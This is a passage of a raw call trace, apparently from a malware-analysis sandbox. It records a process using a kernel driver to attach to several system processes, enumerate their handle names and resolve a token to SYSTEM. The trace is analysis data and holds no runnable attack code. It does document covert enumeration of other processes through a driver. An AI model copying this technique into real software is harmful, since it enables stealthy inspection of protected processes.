Object=0xffffc0014a33f9f0, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.837] ObfDereferenceObject (Object=0xffffc0014a33f9f0) returned 0x8000 [0264.837] IoCompleteRequest () returned 0x0 [0264.837] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.837] PsAcquireProcessExitSynchronization () returned 0x0 [0264.837] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.837] ObReferenceObjectByHandle (in: Handle=0x558, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a36efc0, HandleInformation=0x0) returned 0x0 [0264.837] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.837] PsReleaseProcessExitSynchronization () returned 0x2 [0264.837] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2806e [0264.837] ObQueryNameString (in: Object=0xffffc0014a36efc0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.837] ObfDereferenceObject (Object=0xffffc0014a36efc0) returned 0x8000 [0264.837] IoCompleteRequest () returned 0x0 [0264.837] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.837] PsAcquireProcessExitSynchronization () returned 0x0 [0264.838] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.838] ObReferenceObjectByHandle (in: Handle=0x564, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149ccec80, HandleInformation=0x0) returned 0x0 [0264.838] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.838] PsReleaseProcessExitSynchronization () returned 0x2 [0264.838] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2806d [0264.838] ObQueryNameString (in: Object=0xffffc00149ccec80, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.838] ObfDereferenceObject (Object=0xffffc00149ccec80) returned 0x8000 [0264.838] IoCompleteRequest () returned 0x0 [0264.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x180 [0264.838] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0264.838] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00067eea080, HandleInformation=0x0) returned 0x0 [0264.838] ObOpenObjectByPointer (in: Object=0xffffe00067eea080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.838] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x67fff [0264.838] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a2989c0 | out: TokenHandle=0xffffe0006a2989c0*=0x1a8) returned 0x0 [0264.838] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.838] IoCompleteRequest () returned 0x0 [0264.838] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.838] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.839] CloseHandle (hObject=0x1a8) returned 1 [0264.839] CloseHandle (hObject=0x180) returned 1 [0264.839] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.839] PsAcquireProcessExitSynchronization () returned 0x0 [0264.839] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400) [0264.839] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067eb7480, HandleInformation=0x0) returned 0x0 [0264.839] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.839] PsReleaseProcessExitSynchronization () returned 0x2 [0264.839] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fffd [0264.839] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.839] ObfDereferenceObject (Object=0xffffe00067eb7480) returned 0x7fff [0264.839] IoCompleteRequest () returned 0x0 [0264.839] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.839] PsAcquireProcessExitSynchronization () returned 0x0 [0264.839] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400) [0264.839] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067e9e090, HandleInformation=0x0) returned 0x0 [0264.839] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.839] PsReleaseProcessExitSynchronization () returned 0x2 [0264.846] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fffc [0264.846] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.846] ObfDereferenceObject (Object=0xffffe00067e9e090) returned 0x7fff [0264.846] IoCompleteRequest () returned 0x0 [0264.846] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.846] PsAcquireProcessExitSynchronization () returned 0x0 [0264.846] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400) [0264.846] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069712860, HandleInformation=0x0) returned 0x0 [0264.846] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.846] PsReleaseProcessExitSynchronization () returned 0x2 [0264.846] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fffb [0264.846] ObQueryNameString (in: Object=0xffffe00069712860, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.846] ObfDereferenceObject (Object=0xffffe00069712860) returned 0x7fff [0264.846] IoCompleteRequest () returned 0x0 [0264.846] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.846] PsAcquireProcessExitSynchronization () returned 0x0 [0264.847] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400) [0264.847] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014855aef0, HandleInformation=0x0) returned 0x0 [0264.847] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.847] PsReleaseProcessExitSynchronization () returned 0x2 [0264.847] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fffa [0264.847] ObQueryNameString (in: Object=0xffffc0014855aef0, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.847] ObfDereferenceObject (Object=0xffffc0014855aef0) returned 0x8001 [0264.847] IoCompleteRequest () returned 0x0 [0264.847] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.847] PsAcquireProcessExitSynchronization () returned 0x0 [0264.847] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400) [0264.847] ObReferenceObjectByHandle (in: Handle=0x18c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006c56f360, HandleInformation=0x0) returned 0x0 [0264.847] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.847] PsReleaseProcessExitSynchronization () returned 0x2 [0264.847] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fff9 [0264.847] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.848] ObfDereferenceObject (Object=0xffffe0006c56f360) returned 0x7fff [0264.848] IoCompleteRequest () returned 0x0 [0264.848] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.848] PsAcquireProcessExitSynchronization () returned 0x0 [0264.848] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400) [0264.848] ObReferenceObjectByHandle (in: Handle=0x190, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000745dade0, HandleInformation=0x0) returned 0x0 [0264.848] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.848] PsReleaseProcessExitSynchronization () returned 0x2 [0264.848] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fff8 [0264.848] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.848] ObfDereferenceObject (Object=0xffffe000745dade0) returned 0x7fff [0264.848] IoCompleteRequest () returned 0x0 [0264.848] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.848] PsAcquireProcessExitSynchronization () returned 0x0 [0264.848] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400) [0264.848] ObReferenceObjectByHandle (in: Handle=0x198, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148555690, HandleInformation=0x0) returned 0x0 [0264.848] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.848] PsReleaseProcessExitSynchronization () returned 0x2 [0264.848] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fff7 [0264.848] ObQueryNameString (in: Object=0xffffc00148555690, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.848] ObfDereferenceObject (Object=0xffffc00148555690) returned 0xf7fff [0264.848] IoCompleteRequest () returned 0x0 [0264.848] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.848] PsAcquireProcessExitSynchronization () returned 0x0 [0264.848] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000b1b8e400) [0264.848] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148565d70, HandleInformation=0x0) returned 0x0 [0264.848] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.848] PsReleaseProcessExitSynchronization () returned 0x2 [0264.848] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fff6 [0264.848] ObQueryNameString (in: Object=0xffffc00148565d70, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.848] ObfDereferenceObject (Object=0xffffc00148565d70) returned 0xf8001 [0264.848] IoCompleteRequest () returned 0x0 [0264.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0264.848] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.848] PsAcquireProcessExitSynchronization () returned 0x0 [0264.848] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.848] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067efbb40, HandleInformation=0x0) returned 0x0 [0264.848] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.848] PsReleaseProcessExitSynchronization () returned 0x2 [0264.848] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48178 [0264.848] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.848] ObfDereferenceObject (Object=0xffffe00067efbb40) returned 0x7fff [0264.849] IoCompleteRequest () returned 0x0 [0264.849] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.849] PsAcquireProcessExitSynchronization () returned 0x0 [0264.849] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.849] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697a3580, HandleInformation=0x0) returned 0x0 [0264.849] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.849] PsReleaseProcessExitSynchronization () returned 0x2 [0264.849] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48177 [0264.849] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.849] ObfDereferenceObject (Object=0xffffe000697a3580) returned 0x8000 [0264.849] IoCompleteRequest () returned 0x0 [0264.849] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.849] PsAcquireProcessExitSynchronization () returned 0x0 [0264.849] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.849] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697a3410, HandleInformation=0x0) returned 0x0 [0264.849] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.849] PsReleaseProcessExitSynchronization () returned 0x2 [0264.849] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48176 [0264.849] ObQueryNameString (in: Object=0xffffe000697a3410, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.849] ObfDereferenceObject (Object=0xffffe000697a3410) returned 0x7ffe [0264.849] IoCompleteRequest () returned 0x0 [0264.849] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.849] PsAcquireProcessExitSynchronization () returned 0x0 [0264.849] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.849] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697a32a0, HandleInformation=0x0) returned 0x0 [0264.849] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.849] PsReleaseProcessExitSynchronization () returned 0x2 [0264.849] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48175 [0264.849] ObQueryNameString (in: Object=0xffffe000697a32a0, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.849] ObfDereferenceObject (Object=0xffffe000697a32a0) returned 0x7ffe [0264.849] IoCompleteRequest () returned 0x0 [0264.849] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.849] PsAcquireProcessExitSynchronization () returned 0x0 [0264.849] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.849] ObReferenceObjectByHandle (in: Handle=0x110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697a5f20, HandleInformation=0x0) returned 0x0 [0264.849] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.849] PsReleaseProcessExitSynchronization () returned 0x2 [0264.849] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48174 [0264.849] ObQueryNameString (in: Object=0xffffe000697a5f20, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.849] ObfDereferenceObject (Object=0xffffe000697a5f20) returned 0x7ff2 [0264.849] IoCompleteRequest () returned 0x0 [0264.849] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.849] PsAcquireProcessExitSynchronization () returned 0x0 [0264.850] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.850] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697a57a0, HandleInformation=0x0) returned 0x0 [0264.850] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.850] PsReleaseProcessExitSynchronization () returned 0x2 [0264.850] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48173 [0264.850] ObQueryNameString (in: Object=0xffffe000697a57a0, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.850] ObfDereferenceObject (Object=0xffffe000697a57a0) returned 0x7ffe [0264.850] IoCompleteRequest () returned 0x0 [0264.850] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.850] PsAcquireProcessExitSynchronization () returned 0x0 [0264.850] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.850] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697a5910, HandleInformation=0x0) returned 0x0 [0264.850] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.850] PsReleaseProcessExitSynchronization () returned 0x2 [0264.850] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48172 [0264.850] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.850] ObfDereferenceObject (Object=0xffffe000697a5910) returned 0x8000 [0264.850] IoCompleteRequest () returned 0x0 [0264.850] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.850] PsAcquireProcessExitSynchronization () returned 0x0 [0264.850] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.850] ObReferenceObjectByHandle (in: Handle=0x120, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697a5630, HandleInformation=0x0) returned 0x0 [0264.850] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.850] PsReleaseProcessExitSynchronization () returned 0x2 [0264.850] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48171 [0264.850] ObQueryNameString (in: Object=0xffffe000697a5630, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.850] ObfDereferenceObject (Object=0xffffe000697a5630) returned 0x7ffe [0264.850] IoCompleteRequest () returned 0x0 [0264.850] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.850] PsAcquireProcessExitSynchronization () returned 0x0 [0264.850] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.850] ObReferenceObjectByHandle (in: Handle=0x134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697ad610, HandleInformation=0x0) returned 0x0 [0264.850] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.850] PsReleaseProcessExitSynchronization () returned 0x2 [0264.850] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48170 [0264.850] ObQueryNameString (in: Object=0xffffe000697ad610, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.850] ObfDereferenceObject (Object=0xffffe000697ad610) returned 0x800f [0264.850] IoCompleteRequest () returned 0x0 [0264.850] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.850] PsAcquireProcessExitSynchronization () returned 0x0 [0264.850] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.850] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697ace40, HandleInformation=0x0) returned 0x0 [0264.850] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.851] PsReleaseProcessExitSynchronization () returned 0x2 [0264.851] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4816f [0264.851] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.851] ObfDereferenceObject (Object=0xffffe000697ace40) returned 0x7ffc [0264.851] IoCompleteRequest () returned 0x0 [0264.851] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.851] PsAcquireProcessExitSynchronization () returned 0x0 [0264.851] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.851] ObReferenceObjectByHandle (in: Handle=0x2f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bc1590, HandleInformation=0x0) returned 0x0 [0264.851] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.851] PsReleaseProcessExitSynchronization () returned 0x2 [0264.851] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4816e [0264.851] ObQueryNameString (in: Object=0xffffe00069bc1590, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.851] ObfDereferenceObject (Object=0xffffe00069bc1590) returned 0x7ffe [0264.851] IoCompleteRequest () returned 0x0 [0264.851] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.851] PsAcquireProcessExitSynchronization () returned 